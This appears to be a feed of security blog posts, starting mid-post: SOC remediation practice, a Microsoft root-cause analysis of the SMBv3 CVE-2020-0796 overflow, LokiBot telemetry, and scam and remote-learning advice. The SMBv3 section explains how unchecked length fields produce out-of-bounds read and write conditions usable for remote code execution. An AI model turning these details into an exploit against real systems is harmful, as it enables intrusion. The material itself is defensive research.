At the top of the detection timeline you’ll receive a short description of what happened. The threat has already been examined by a team of detection engineers from Red Canary’s Cyber Incident Response Team (CIRT), so you don’t have to worry about triage or investigation. As you scroll down, you can quickly see the results of the investigation that Red Canary’s senior detection engineers have done on your behalf, including detailed notes that provide context to what’s happening in your environment:

MISA8

Notes from Red Canary senior detection engineers (in light blue) provide valuable context.

You’re only notified of true threats and not false positives. This means you can focus on responding rather than digging through data to figure out what happened.

What if you don’t want to be woken up, you’re truly unavailable, or you just want bad stuff immediately dealt with? Use Red Canary’s automation to handle remediation on the fly. You and your team can create playbooks in your Red Canary portal to respond to threats immediately, even if you’re unavailable.

MISA9

Red Canary automation playbook.

This playbook allows you to isolate the endpoint (using the Machine Action resource type in the Microsoft Defender ATP APIs) if Red Canary identifies suspicious activity. You also have the option to set up Automate playbooks that depend on an hourly schedule. For example, you may want to approve endpoint isolation during normal work hours, but use automatic isolation overnight:

MISA10

Red Canary Automate playbook to automatically remediate a detection.

Getting started with Red Canary

Whether you’ve been using Microsoft Defender ATP since it’s preview releases or if you’re just getting started, Red Canary is the fastest way to accelerate your security operations program. Immediate onboarding, increased detection coverage, and a 24/7 CIRT team are all at your fingertips.

Terence Jackson, CISO at Thycotic and Microsoft Defender ATP user, describes what it’s like working with Red Canary:

“I have a small team that has to protect a pretty large footprint. I know the importance of detecting, preventing, and stopping problems at the entry point, which is typically the endpoint. We have our corporate users but then we also have SaaS customers we have to protect. Currently my team tackles both, so for me it’s simply having a trusted partner that can take the day-to-day hunting/triage/elimination of false positives and only provide actionable alerts/intel, which frees my team up to do other critical stuff.”

Red Canary is the fastest way to enhance your detection coverage from Microsoft Defender ATP so you know exactly when and where to respond.

Contact us to see a demo and learn more.

The post How to gain 24/7 detection and response coverage with Microsoft Defender ATP appeared first on Microsoft Security.

Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2

This is the sixth blog in the Lessons learned from the Microsoft SOC series designed to share our approach and experience from the front lines of our security operations center (SOC) protecting Microsoft and our Detection and Response Team (DART) helping our customers with their incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

COVID-19 and the SOC

Before we conclude the day in the life, we thought we would share an analyst’s eye view of the impact of COVID-19. Our analysts are mostly working from home now and our cloud based tooling approach enabled this transition to go pretty smoothly. The differences in attacks we have seen are mostly in the early stages of an attack with phishing lures designed to exploit emotions related to the current pandemic and increased focus on home firewalls and routers (using techniques like RDP brute-forcing attempts and DNS poisoning—more here). The attack techniques they attempt to employ after that are fairly consistent with what they were doing before.

A day in the life—remediation

When we last left our heroes in the previous entry, our analyst had built a timeline of the potential adversary attack operation. Of course, knowing what happened doesn’t actually stop the adversary or reduce organizational risk, so let’s remediate this attack!

  1. Decide and act—As the analyst develops a high enough level of confidence that they understand the story and scope of the attack, they quickly shift to planning and executing cleanup actions. While this appears as a separate step in this particular description, our analysts often execute on cleanup operations as they find them.

Big Bang or clean as you go?

Depending on the nature and scope of the attack, analysts may clean up attacker artifacts as they go (emails, hosts, identities) or they may build a list of compromised resources to clean up all at once (Big Bang)

  • Clean as you go—For most typical incidents that are detected early in the attack operation, analysts quickly clean up the artifacts as we find them. This rapidly puts the adversary at a disadvantage and prevents them from moving forward with the next stage of their attack.
  • Prepare for a Big Bang—This approach is appropriate for a scenario where an adversary has already “settled in” and established redundant access mechanisms to the environment (frequently seen in incidents investigated by our Detection and Response Team (DART) at customers). In this case, analysts should avoid tipping off the adversary until full discovery of all attacker presence is discovered as surprise can help with fully disrupting their operation. We have learned that partial remediation often tips off an adversary, which gives them a chance to react and rapidly make the incident worse (spread further, change access methods to evade detection, inflict damage/destruction for revenge, cover their tracks, etc.).Note that cleaning up phishing and malicious emails can often be done without tipping off the adversary, but cleaning up host malware and reclaiming control of accounts has a high chance of tipping off the adversary.

These are not easy decisions to make and we have found no substitute for experience in making these judgement calls. The collaborative work environment and culture we have built in our SOC helps immensely as our analysts can tap into each other’s experience to help making these tough calls.

The specific response steps are very dependent on the nature of the attack, but the most common procedures used by our analysts include:

  • Client endpoints—SOC analysts can isolate a computer and contact the user directly (or IT operations/helpdesk) to have them initiate a reinstallation procedure.
  • Server or applications—SOC analysts typically work with IT operations and/or application owners to arrange rapid remediation of these resources.
  • User accounts—We typically reclaim control of these by disabling the account and resetting password for compromised accounts (though these procedures are evolving as a large amount of our users are mostly passwordless using Windows Hello or another form of MFA). Our analysts also explicitly expire all authentication tokens for the user with Microsoft Cloud App Security.
    Analysts also review the multi-factor phone number and device enrollment to ensure it hasn’t been hijacked (often contacting the user), and reset this information as needed.
  • Service Accounts—Because of the high risk of service/business impact, SOC analysts work with the service account owner of record (falling back on IT operations as needed) to arrange rapid remediation of these resources.
  • Emails—The attack/phishing emails are deleted (and sometimes cleared to prevent recovering of deleted emails), but we always save a copy of original email in the case notes for later search and analysis (headers, content, scripts/attachments, etc.).
  • Other—Custom actions can also be executed based on the nature of the attack such as revoking application tokens, reconfiguring servers and services, and more.

Automation and integration for the win

It’s hard to overstate the value of integrated tools and process automation as these bring so many benefits—improving the analysts daily experience and improving the SOC’s ability to reduce organizational risk.

  • Analysts spend less time on each incident, reducing the attacker’s time to operation—measured by mean time to remediate (MTTR).
  • Analysts aren’t bogged down in manual administrative tasks so they can react quickly to new detections (reducing mean time to acknowledge—MTTA).
  • Analysts have more time to engage in proactive activities that both reduce organization risk and increase morale by keeping them focused on the mission.

Our SOC has a long history of developing our own automation and scripts to make analysts lives easier by a dedicated automation team in our SOC. Because custom automation requires ongoing maintenance and support, we are constantly looking for ways to shift automation and integration to capabilities provided by Microsoft engineering teams (which also benefits our customers). While still early in this journey, this approach typically improves the analyst experience and reduces maintenance effort and challenges.

This is a complex topic that could fill many blogs, but this takes two main forms:

  • Integrated toolsets save analysts manual effort during incidents by allowing them to easily navigate multiple tools and datasets. Our SOC relies heavily on the integration of Microsoft Threat Protection (MTP) tools for this experience, which also saves the automation team from writing and supporting custom integration for this.
  • Automation and orchestration capabilities reduce manual analyst work by automating repetitive tasks and orchestrating actions between different tools. Our SOC currently relies on an advanced custom SOAR platform and is actively working with our engineering teams (MTP’s AutoIR capability and Azure Sentinel SOAR) on how to shift our learnings and workload onto those capabilities.

After the attacker operation has been fully disrupted, the analyst marks the case as remediated, which is the timestamp signaling the end of MTTR measurement (which started when the analyst began the active investigation in step 2 of the previous blog).

While having a security incident is bad, having the same incident repeated multiple times is much worse.

  1. Post-incident cleanup—Because lessons aren’t actually “learned” unless they change future actions, our analysts always integrate any useful information learned from the investigation back into our systems. Analysts capture these learnings so that we avoid repeating manual work in the future and can rapidly see connections between past and future incidents by the same threat actors. This can take a number of forms, but common procedures include:
    • Indicators of Compromise (IoCs)—Our analysts record any applicable IoCs such as file hashes, malicious IP addresses, and email attributes into our threat intelligence systems so that our SOC (and all customers) can benefit from these learnings.
    • Unknown or unpatched vulnerabilities—Our analysts can initiate processes to ensure that missing security patches are applied, misconfigurations are corrected, and vendors (including Microsoft) are informed of “zero day” vulnerabilities so that they can create security patches for them.
    • Internal actions such as enabling logging on assets and adding or changing security controls. 

Continuous improvement

So the adversary has now been kicked out of the environment and their current operation poses no further risk. Is this the end? Will they retire and open a cupcake bakery or auto repair shop? Not likely after just one failure, but we can consistently disrupt their successes by increasing the cost of attack and reducing the return, which will deter more and more attacks over time. For now, we must assume that adversaries will try to learn from what happened on this attack and try again with fresh ideas and tools.

Because of this, our analysts also focus on learning from each incident to improve their skills, processes, and tooling. This continuous improvement occurs through many informal and formal processes ranging from formal case reviews to casual conversations where they tell the stories of incidents and interesting observations.

As caseload allows, the investigation team also hunts proactively for adversaries when they are not on shift, which helps them stay sharp and grow their skills.

This closes our virtual shift visit for the investigation team. Join us next time as we shift to our Threat hunting team (a.k.a. Tier 3) and get some hard won advice and lessons learned.

…until then, share and enjoy!

P.S. If you are looking for more information on the SOC and other cybersecurity topics, check out previous entries in the series (Part 1 | Part 2a | Part 2b | Part 3a | Part 3b), Mark’s List (https://aka.ms/markslist), and our new security documentation site—https://aka.ms/securitydocs. Be sure to bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to Mark on LinkedIn or Twitter.

The post Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2 appeared first on Microsoft Security.

Mitigating vulnerabilities in endpoint network stacks

The skyrocketing demand for tools that enable real-time collaboration, remote desktops for accessing company information, and other services that enable remote work underlines the tremendous importance of building and shipping secure products and services. While this is magnified as organizations are forced to adapt to the new environment created by the global crisis, it’s not a new imperative. Microsoft has been investing heavily in security, and over the years our commitment to building proactive security into products and services has only intensified.

To help deliver on this commitment, we continuously find ways to improve and secure Microsoft products. One aspect of our proactive security work is finding vulnerabilities and fixing them before they can be exploited. Our strategy is to take a holistic approach and drive security throughout the engineering lifecycle. We do this by:

  • Building security early into the design of features.
  • Developing tools and processes that proactively find vulnerabilities in code.
  • Introducing mitigations into Windows that make bugs significantly harder to exploit.
  • Having our world-class penetration testing team test the security boundaries of the product so we can fix issues before they can impact customers.

This proactive work ensures we are continuously making Windows safer and finding as many issues as possible before attackers can take advantage of them. In this blog post we will discuss a recent vulnerability that we proactively found and fixed and provide details on tools and techniques we used, including a new set of tools that we built internally at Microsoft. Our penetration testing team is constantly testing the security boundaries of the product to make it more secure, and we are always developing tools that help them scale and be more effective based on the evolving threat landscape. Our investment in fuzzing is the cornerstone of our work, and we are constantly innovating this tech to keep on breaking new ground.

Proactive security to prevent the next WannaCry

In the past few years, much of our team’s efforts have been focused on uncovering remote network vulnerabilities and preventing events like the WannaCry and NotPetya outbreaks. Some bugs we have recently found and fixed include critical vulnerabilities that could be leveraged to exploit common secure remote communication tools like RDP or create ransomware issues like WannaCry: CVE-2019-1181 and CVE-2019-1182 dubbed “DejaBlue“, CVE-2019-1226 (RCE in RDP Server), CVE-2020-0611 (RCE in RDP Client), and CVE-2019-0787 (RCE in RDP client), among others.

One of the biggest challenges we regularly face in these efforts is the sheer volume of code we analyze. Windows is enormous and continuously evolving 5.7 million source code files, with more than 3,500 developers doing 1,100 pull requests per day in 440 official branches. This rapid cadence and evolution allows us to add new features as well proactively drive security into Windows.

Like many security teams, we frequently turn to fuzzing to help us quickly explore and assess large codebases. Innovations we’ve made in our fuzzing technology have made it possible to get deeper coverage than ever before, resulting in the discovery of new bugs, faster. One such vulnerability is the remote code vulnerability (RCE) in Microsoft Server Message Block version 3 (SMBv3) tracked as CVE-2020-0796 and fixed on March 12, 2020.

In the following sections, we will share the tools and techniques we used to fuzz SMB, the root cause of the RCE vulnerability, and relevant mitigations to exploitation.

Fully deterministic person-in-the-middle fuzzing

We use a custom deterministic full system emulator tool we call “TKO” to fuzz and introspect Windows components.  TKO provides the capability to perform full system emulation and memory snapshottting, as well as other innovations.  As a result of its unique design, TKO provides several unique benefits to SMB network fuzzing:

  • The ability to snapshot and fuzz forward from any program state.
  • Efficiently restoring to the initial state for fast iteration.
  • Collecting complete code coverage across all processes.
  • Leveraging greater introspection into the system without too much perturbation.

While all of these actions are possible using other tools, our ability to seamlessly leverage them across both user and kernel mode drastically reduces the spin-up time for targets. To learn more, check out David Weston’s recent BlueHat IL presentation “Keeping Windows secure”, which touches on fuzzing, as well as the TKO tool and infrastructure.

Fuzzing SMB

Given the ubiquity of SMB and the impact demonstrated by SMB bugs in the past, assessing this network transfer protocol has been a priority for our team. While there have been past audits and fuzzers thrown against the SMB codebase, some of which postdate the current SMB version, TKO’s new capabilities and functionalities made it worthwhile to revisit the codebase. Additionally, even though the SMB version number has remained static, the code has not! These factors played into our decision to assess the SMB client/server stack.

After performing an initial audit pass of the code to understand its structure and dataflow, as well as to get a grasp of the size of the protocol’s state space, we had the information we needed to start fuzzing.

We used TKO to set up a fully deterministic feedback-based fuzzer with a combination of generated and mutated SMB protocol traffic. Our goal for generating or mutating across multiple packets was to dig deeper into the protocol’s state machine. Normally this would introduce difficulties in reproducing any issues found; however, our use of emulators made this a non-issue. New generated or mutated inputs that triggered new coverage were saved to the input corpus. Our team had a number of basic mutator libraries for different scenarios, but we needed to implement a generator. Additionally, we enabled some of the traditional Windows heap instrumentation using verifier, turning on page heap for SMB-related drivers.

We began work on the SMBv2 protocol generator and took a network capture of an SMB negotiation with the aim of replaying these packets with mutations against a Windows 10, version 1903 client. We added a mutator with basic mutations (e.g., bit flips, insertions, deletions, etc.) to our fuzzer and kicked off an initial run while we continued to improve and develop further.

Figure 1. TKO fuzzing workflow

A short time later, we came back to some compelling results. Replaying the first crashing input with TKO’s kdnet plugin revealed the following stack trace:

> tkofuzz.exe repro inputs\crash_6a492.txt -- kdnet:conn 127.0.0.1:50002

Figure 2. Windbg stack trace of crash

We found an access violation in srv2!Smb2CompressionDecompress.

Finding the root cause of the crash

While the stack trace suggested that a vulnerability exists in the decompression routine, it’s the parsing of length counters and offsets from the network that causes the crash. The last packet in the transaction needed to trigger the crash has ‘\xfcSMB’ set as the first bytes in its header, making it a COMPRESSION_TRANSFORM packet.

Figure 3. COMPRESSION_TRANSFORM packet details

The SMBv2 COMPRESSION_TRANSFORM packet starts with a COMPRESSION_TRANSFORM_HEADER, which defines where in the packet the compressed bytes begin and the length of the compressed buffer.

typedef struct _COMPRESSION_TRANSFORM_HEADER

{

UCHAR   Protocol[4]; // Contains 0xFC, 'S', 'M', 'B'

ULONG    OriginalMessageSize;

USHORT AlgorithmId;

USHORT Flags;

ULONG Length;

}

In the srv2!Srv2DecompressData in the graph below, we can find this COMPRESSION_TRANSFORM_HEADER struct being parsed out of the network packet and used to determine pointers being passed to srv2!SMBCompressionDecompress.

Figure 4. Srv2DecompressData graph

We can see that at 0x7e94, rax points to our network buffer, and the buffer is copied to the stack before the OriginalCompressedSegmentSize and Length are parsed out and added together at 0x7ED7 to determine the size of the resulting decompressed bytes buffer. Overflowing this value causes the decompression to write its results out of the bounds of the destination SrvNet buffer, in an out-of-bounds write (OOBW).

Figure 5. Overflow condition

Looking further, we can see that the Length field is parsed into esi at 0x7F04, added to the network buffer pointer, and passed to CompressionDecompress as the source pointer. As Length is never checked against the actual number of received bytes, it can cause decompression to read off the end of the received network buffer. Setting this Length to be greater than the packet length also causes the computed source buffer length passed to SmbCompressionDecompress to underflow at 0x7F18, creating an out-of-bounds read (OOBR) vulnerability. Combining this OOBR vulnerability with the previous OOBW vulnerability creates the necessary conditions to leak addresses and create a complete remote code execution exploit.

Figure 6. Underflow condition

Windows 10 mitigations against remote network vulnerabilities

Our discovery of the SMBv3 vulnerability highlights the importance of revisiting protocol stacks regularly as our tools and techniques continue to improve over time. In addition to the proactive hunting for these types of issues, the investments we made in the last several years to harden Windows 10 through mitigations like address space layout randomization (ASLR), Control Flow Guard (CFG), InitAll, and hypervisor-enforced code integrity (HVCI) hinder trivial exploitation and buy defenders time to patch and protect their networks.

For example, turning vulnerabilities like the ones discovered in SMBv3 into working exploits requires finding writeable kernel pages at reliable addresses, a task that requires heap grooming and corruption, or a separate vulnerability in Windows kernel address space layout randomization (ASLR). Typical heap-based exploits taking advantage of a vulnerability like the one described here would also need to make use of other allocations, but Windows 10 pool hardening helps mitigate this technique. These mitigations work together and have a cumulative effect when combined, increasing the development time and cost of reliable exploitation.

Assuming attackers gain knowledge of our address space, indirect jumps are mitigated by kernel-mode CFG. This forces attackers to either use data-only corruption or bypass Control Flow Guard via stack corruption or yet another bug. If virtualization-based security (VBS) and HVCI are enabled, attackers are further constrained in their ability to map and modify memory permissions.

On Secured-core PCs these mitigations are enabled by default.  Secured-core PCs combine virtualization, operating system, and hardware and firmware protection. Along with Microsoft Defender Advanced Threat Protection, Secured-core PCs provide end-to-end protection against advanced threats.

While these mitigations collectively lower the chances of successful exploitation, we continue to deepen our investment in identifying and fixing vulnerabilities before they can get into the hands of adversaries.

 

The post Mitigating vulnerabilities in endpoint network stacks appeared first on Microsoft Security.

Cyber Threats Observatory Gets Improvements

Today I am so happy to announce a big improvement in the threats observatory (available for here). The main improvement sees the introduction of clustering stereotypes for each tracked malware family in three different behaviors: Domains, Files and Processes.

Every malware does specific actions on domains, files and processes realms by meaning that every sample contacts several domain names, spawns specific processes and eventually saves file on HD (file-less malware are a separate topic here). Collecting everything coming from their execution and clustering on strings similitude would highlight several stereotypes that would be interesting for further studies or similitude blocking lists. The following image shows the current deployment state.

Screenshot Cyber Threats Observatory (HERE)

What you find

According to shared information, the Cyber Threats Observatory Dashboard is composed by the following sections:

  • Malware Families Trends. Detection distribution over time. In other words what are time-frames in where specific families are most active respect to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples were not classified in terms of families, this happens when no signatures match the samples or if multiple family signatures match the same sample. In both ways I am not sure where the sample belong with, so it would be classified as “unknown” and not visualized on this graph. Missing slice of the cake is attributed to “unknown”.
  • Distribution Types. Based on the magic file bytes this graph would track the percentages of file types that Malware used as carrier.
  • Threat Level Distribution. From 0 to 3 is getting more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to understand if hidden in unknown families Malware or false positives would hide. For such a reason a dedicated graph named Unknown Families Threat Level Distribution has created.
  • Stereotypes. Studying stereotypes would be useful to analyze similarities in clusters. In other words, it could be nice to see what are the patterns used by malware in both: domain names, file names and process names. It would be important for detection and even for preemptive blocking. Due to a vast amount of data, only the last (in term of recent) 10000 entries are included.
  • TOP domains, TOP processes and TOP File Names. With a sliding window of 300 last analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. Again, there is no filter and no post-processing analysis in that fields, by meaning you could probably find as TOP domain “google.com” or “microsoft update”, which is fine, since if the sample queried them before performing its malicious intent, well, it is simply recorded and took to your attention. Same cup of tea with processes and file names.Indeed those fields are include the term “involved” into their title, if something is involved it does not mean that it is malicious , but that it is accounted to be in a malicious chain.

A simple example

Let’s assume we want to investigate LokiBot. According with any.run: Lokibot, also known as Loki-bot or Loki bot, is an information stealer malware that collects data from most widely used web browsers, FTP, email clients and over a hundred software tools installed on the infected machine.

But let’s start digging a little bit on the Cyber Threats Dashboard and see what we can find. First of all from the Malware Families section we see the overall detection rate. Today, we might easily say that LokiBit has low rate detection percentage 0.32388 if compared to different families such as GrandCrab, Emotet or TrickBot.

Malware Families

From the Family Distribution Over Time section (the following image) we might appreciate the detection distribution rate. By deselecting the unwanted malware families it is possible to track the distribution of the desire one (on our case LokiBot) over the time. In the following case all families but not LokiBot have been disable (by clicking on the Malware name directly from the graph legend). We might appreciate a compelling increment of LokiBot detection on 2020-04-28 and from 2020-04-30 to 2020-05-02. It looks like to be the most active observed period for this well documented family during the 2020. This observation perfectly fits the public mainstream information which sees many security magazines and many vendors observing such an increment as well. Mostly spread over COVID#19 malspam for example: SecurityAffairs, BankInfoSecurity, ThreatPOST, FortiNet.

Families Distribution Over Time

Digging a little bit into the specific case, we might observe the domain stereotypes. It’s nice to see that many domains stereotypes (in other words the representatives of a wide set of similar domains) have as the Top Level Domain .cf (Central Africa Republic) and some of them are quire similar: broken1.cf, broken2.cf, and so on and so forth. Something not very original to be blocked such as: broken<number>.cf

LokiBot Domain Stereotypes as 2020-05-02

Following on the diagram we might observe one more domain stereotype having as TLD .ICU, in the particular frenchman.icu (generic TLD targeting entrepreneurs and business owners) and following on this path one more domain stereotype having .co.ke (referring to Kenya). Now let’s try to focus a little bit on “Files” and check if there are some patterns in “File section”. So let’s check the following diagram.

LokiBot File Stereotypes as 2020-05-02

The linearity of the composition (every stereotype gets the same score, in that case 3) looks like the malware equally uses the different group of files, by meaning that if it starts on a victim machine it reads/creates/writes every single file at least one time per run. We might appreciate a nice pattern in the temporary file names, but it wont help us in detection since default windows temporary file pattern. However we might associate the presence of such a temporary files to the direct usage of spoolsv.exe, mrsys.exe and even explorer.exe. Even if many false positive could be triggered it would be nice to give it a try and see where it takes !

Most interested would be the presence of a specific file ([a..z][0.9]).lck that would be a nice keypoint to check its presence (by using files detection)

Conclusion

In this post I’ve introduced a big improvement of the Cyber Threat Observatory showing up a quick and dirty analysis on LokiBot through stereotypes. Aim of this project is not to give detailed analyses on Malware but rather focusing on general patterns and macro stereotypes in order to perform massive data analysis.

Hope you might find it useful, if so please share it with your fellows.

Cybercriminals Are Exploiting the Covid-19 Pandemic

Cybercriminals are actively targeting Covid-19 hotspots with malware and phishing campaigns, according to a new report from Bitdefender.

The report, “Coronavirus-themed Threat Reports Haven’t Flattened the Curve,” shows a direct correlation between confirmed Covid-19 cases and malware attacks exploiting the crisis.

These findings confirm a similar report that showed a 30000% increase in Covid-19-themed attacks from January to March.

“Countries that have reported the largest number of Coronavirus-themed [scams] seem to have also been those hit hardest by the pandemic,” the report stated, showing a concurrent increase in both confirmed cases and malware attacks in South Africa in April as an example.

Data from the Bitdefender report also indicated a connection between an increase in phishing campaigns in areas where testing for Covid-19 has become available.

“[W]e can safely infer that people who get tested are interested in learning more about potential treatments, medicine, medical best practices, and maybe even other patient’s experiences… those spending more time online looking for information about COVID-19 are more likely to fall prey to scams and malware related to Coronavirus,” the report stated. “Receiving an email claiming to have new and interesting information about the pandemic with more exclusive information embedded within the attachment is the perfect lure.”

Read the full report here.

The post Cybercriminals Are Exploiting the Covid-19 Pandemic appeared first on Adam Levin.

How to Spot an Online Scam?

With the advent of ‘smart’ devices, which includes everything from self-driving cars, smart assistants such as Amazon’s Alexa to smart refrigerators, the modern-day internet continues to expand into the vast IoT, giving rise to a highly interconnected digital landscape.

On the surface, the interconnectivity offered by the IoT seems to be highly advantageous, and although that might be true to a certain extent, it also offers several entry points for cybercriminals to profit off of naive internet users.

Moreover, despite the 391,000,000 Google search results that come up when you type the words ‘online scams,’ for many individuals, there are still many doubts and uncertainties as far as online fraud is concerned, particularly in light of how easy it’s become to falsify reviews in Google and elsewhere.

For starters, the most basic mistake that the naive internet user is likely to make is to group together all sorts of online scams, and cybercrimes together, which results in the poor prioritization of threats. Along with the misunderstanding that all scams are created equal, the typical internet user is also unequipped with the means to identify subtler scams.

In an attempt to aid our readers in identifying an online scam while it is still in its initial stages, we’ve compiled an article that covers everything that you need to know about online scamming, along with tips to prevent them from happening, and steps that you can take in the instance you find yourself a victim of an online scam.

What Exactly is an “Online Scam”?

Up till this point, we’ve only skimmed over the details of what an online scam is. To put it quite simply, and as the name itself suggests, an online scam is a type of digital fraud. With rapid-paced advancements being made in email marketing, internet protocol technology, and web hosting performance, online scams have taken on an arsenal of forms, all of which are growing increasingly sophisticated.

How sophisticated, exactly? In a recent interview with Gary Stevens, founder of the Ottawa-based web hosting reviews website HostingCanada.org, Stevens said this: “Since 2016, we’ve seen a 381% increase in the sophistication of online scams routed through most Canadian web hosts. Not only are they increasing in frequency, but also in sophistication.”

Having said that, the pivotal focus of an online scam is to leverage an individual’s personal information for financial gains. Typically, the stolen confidential data is utilized by cybercriminals to trick people into giving them money.

Most online scams fall into one of the following categories, which include the following:

The Email Money Scam

Perhaps the least sophisticated online scam out there, email money online frauding schemes rely heavily on the naivete of its victims, to fall into the hackers’ poorly constructed web of deceit.

One of the most common examples of the email money scam is the ‘Nigerian bank scam,’ which sends potential victims emails, or messages, which usually leads to some sort of advanced-fee fraud taking place. Fortunately, however, despite how persistent the Nigerian 419 scam is, one need only look out for the many red flags to avoid it.

The ‘Compromised’ Friend

One of the defining characteristics of an online scam is that they usually propagate in every aspect of an individual’s life, including friendships, which as it turns out, offer an excellent medium to further spread the scam.

We’ve all been in situations where we’ve received an urgent message on Facebook Messenger from a distant relative, or acquaintance expressing a grave situation that they’ve landed themselves in, and how they need financial help from you. Unlike the email money scam, people are more likely to fall for a message from a compromised friend, since they think that they’re helping an acquaintance in need.

The Tailor-Made Problem

As technology steers itself forward at lighting pace, cybercriminals all over the place have taken to creating increasingly sophisticated and complex scamming schemes. One such example is when online scammers scour through your social media platforms, along with the sensitive information that they’ve stolen, to create a specific problem in an attempt to coerce an immediate payment. Typically, the problem may involve a family emergency or an alleged debt that needs to be paid off immediately.

Why Do Individuals Fall for Online Scams?

From what we’ve described so far, some of our more cynical readers might be wondering why people fall for online scams in the first place. Some of them, such as the Nigerian 419 scams, have several tell-tale signs that make avoiding the scam a piece of cake.

Despite the multiple red flags that an online scam might display, individuals fall prey to online fraud schemes, simply because these scams are designed in a way that enables cybercriminals to prey on the natural human inclination to seek gain.

Simply put, an online scam works because it targets individuals’ emotions, rather than their logic. For an online scammer, the task is quite simple- all they have to do is come up with an offer that is too good to be true, or a situation that leverages someone’s weakness and makes money off of it.

In addition to preying on our innate human tendency to seek gain and avoid loss, these online scams also target the instinctive choices that we make. Some of the most common examples of this are the fear of missing out, where we’re promised a huge reward but only if we act instantaneously. Similarly, there’s loss aversion, which has an individual act quickly to avoid facing bigger losses later.

How Do Online Scammers Discover Their Victims?

As is the case with most scams, whether they be online or not, scammers rely on an arsenal of ways to wreak damage on their victims. Some of the most popular ways through which online scammers lure their victims include the following:

●     Email Phishing:

The most common way through which online scammers launch their deceiving schemes is through email phishing. Phishing refers to cybercriminals sending emails containing a malicious link to a fraudulent website, which is typically disguised as a banking or e-commerce site, which tricks the victims into giving their financial details.

●     Mobile Phishing:

Similar to email phishing, mobile phishing focuses on getting potential victims to download malware on their mobile devices. The malware then works in the background, to snoop around and collect sensitive information of the victim, including financial details.

●     Fake Software:

Another popular way for cybercriminals to launch their online scams is through fake software, which is also referred to as scareware. While browsing, potential victims receive a pop-up window indicating that their device has been infected with a virus. Once users click on a link to remove the infection, the scareware installs malware on their device, which allows the scammer to harvest confidential information for their monetary gains.

●     Social Media:

Sometimes, popular social media platforms can also house online scams, which encourages users to click on a malicious link. Furthermore, since people are very forthcoming with their personal information on social media platforms, they can also be highly susceptible to identity theft, and socially engineered scams.

Can Online Scams Be Avoided?

Despite seeing a spike in both popularity and complexity, individuals can still avoid online scams, by taking a couple of simple steps, which consist of the following:

  • Try to stay away from posting personal information on your social media accounts. Although the temptation to post about our achievements might be too strong, we’d recommend that you don’t provide cybercriminals with a data source to launch socially engineered attacks, and scams on you in the future.
  • Avoid clicking on any unexpected links, which includes pop-up windows, and any ‘shady’ links present within the body of an email that you’ve received.
  • If you’re stuck in a situation where the other party is pressuring you for immediate payment, we’d highly suggest that you ask them for documentation, which is surely going to confirm their legitimacy.
  • The last one on our list shouldn’t even be here, but unfortunately, there have been several cases of people giving their passwords to strangers online. The basic rule that you need to engrave on to your hearts, is to never, under any circumstance, give your password to people!

 What Steps Can You Take Once You’ve Fallen Prey to An Online Scam?

In the unfortunate instance that you’ve fallen victim to an online fraud scheme, the first and foremost step that you need to take is to report the scam.

We’d suggest that you report it to a legitimate organization such as the FTC or the Internet Crime Complaint Center (IC3). They may be able to point you toward reputable data recovery services, but it’s hard to say whether or not they will be able to fix all the damage that’s been done.

Moreover, if you notice any suspicious credit/debit card transactions, contact your bank and ask them to reverse any fraudulent charges.

In cases where you suspect that your devices have been infected with malware, run an antivirus and antimalware software, along with changing all your passwords to protect any further sensitive information from being compromised.

Last but certainly not least, notify all your friends and family about the scam, so as to prevent the scam from propagating any further than it already has.

 

Conclusion

At the end of the article, we can only hope that we’ve gotten the basics of spotting an online scam down for our readers. As scammers employ a variety of complex techniques to deceive innocent people, we’d like our readers to realize the significance of taking their privacy seriously, and taking the aforementioned steps to stay safe online!

The post How to Spot an Online Scam? appeared first on .

Way Out of The MAZE: A Quick Guide For Defending Against Maze Ransomware

From late 2019, MAZE Ransomware started becoming infamous for its Encryption, data stealing and the subsequent selling of the stolen data. Few other reasons behind its popularity are also its unique targets and the ransom demands. From its inception around May 2019, MAZE actors are targeting multiple sectors, prominent ones…

How to Stay Secure While Distance Learning: Don’t Get Schooled by Hackers

Many students hold their college experience near and dear to their hearts. Apart from working towards a degree and a desired career path, students rely on college to make lifelong friends and gain a heightened sense of responsibility and independenceBut due to recent circumstances, many college students had this experience interrupted or put on pause. With many schools closed for the remainder of the year, college students have moved from in-person course work to virtual classrooms, or distance learningDistance learning has consequentially led to a rapid uptick in online learning among college students. But as more students continue their curriculum from home and online activity increasesthe need for enhanced security increases as well.  

Video Lectures

The transition to distance learning has led to many teachers and schools turning to online video conferencing tools to conduct virtual lectures. However, many of these tools have proven to lack the necessary security measures. As we’ve previously discussed, many users have been found sharing their meeting links on social media platforms like Twitter. This could allow an attacker to simply click on one of these links and interrupt an online lecture or club meeting with inappropriate content. As a result, students could lose valuable time meant to be spent toward their education. And while some schools have banned some online conferencing tools from being used for distance learning, it’s important for students to stay educated on the various security risks involved with video lectures, whether their school has provided guidelines or not.  

Connected Devices & Home Networks

Many schools and universities have asked for students to move out of their on-campus housing for the remainder of the school year. Moving off campus means that the devices and school networks provided by a campus may no longer be available to students. While many students already leverage their personal device for schoolwork, this situation makes those devices the only option.  

Additionally, much like those who have made the transition to working from home, using personal devices on home networks could pose a variety of threats. Students are moving from their universities’ professionally managed networks to home Wi-Fi setups protected with basic passwords, which are usually more easily infiltrated by hackers. Once a hacker gains access to a student’s home network, they have the opportunity to exploit other devices connected to the Wi-Fi.  

How to Secure Your Virtual Classroom

So, what can students do to help ensure that their path towards a degree isn’t interrupted by the adoption of distance learning? Taking online security seriously is the perfect place to start. Here are some tips to help ensure that learning from home goes as smoothly as possible.  

Choose an Encrypted Online Conferencing Tool

Does the video conferencing tool you’re considering use end-to-end encryption? This ensures that only meeting participants have the ability to decrypt secure meeting content. Additionally, be sure to read the privacy policies listed by the video conferencing programs to find the one that is the most secure and fits your needs.   

Use a VPN

Avoid hackers infiltrating your network by using a VPNwhich allows you to send and receive data while encrypting, or scrambling, your information so others can’t read itBy helping to protect your network, VPNs also prevent hackers from gaining to other devices connected to your Wi-Fi.  

Take Password Protection Seriously.

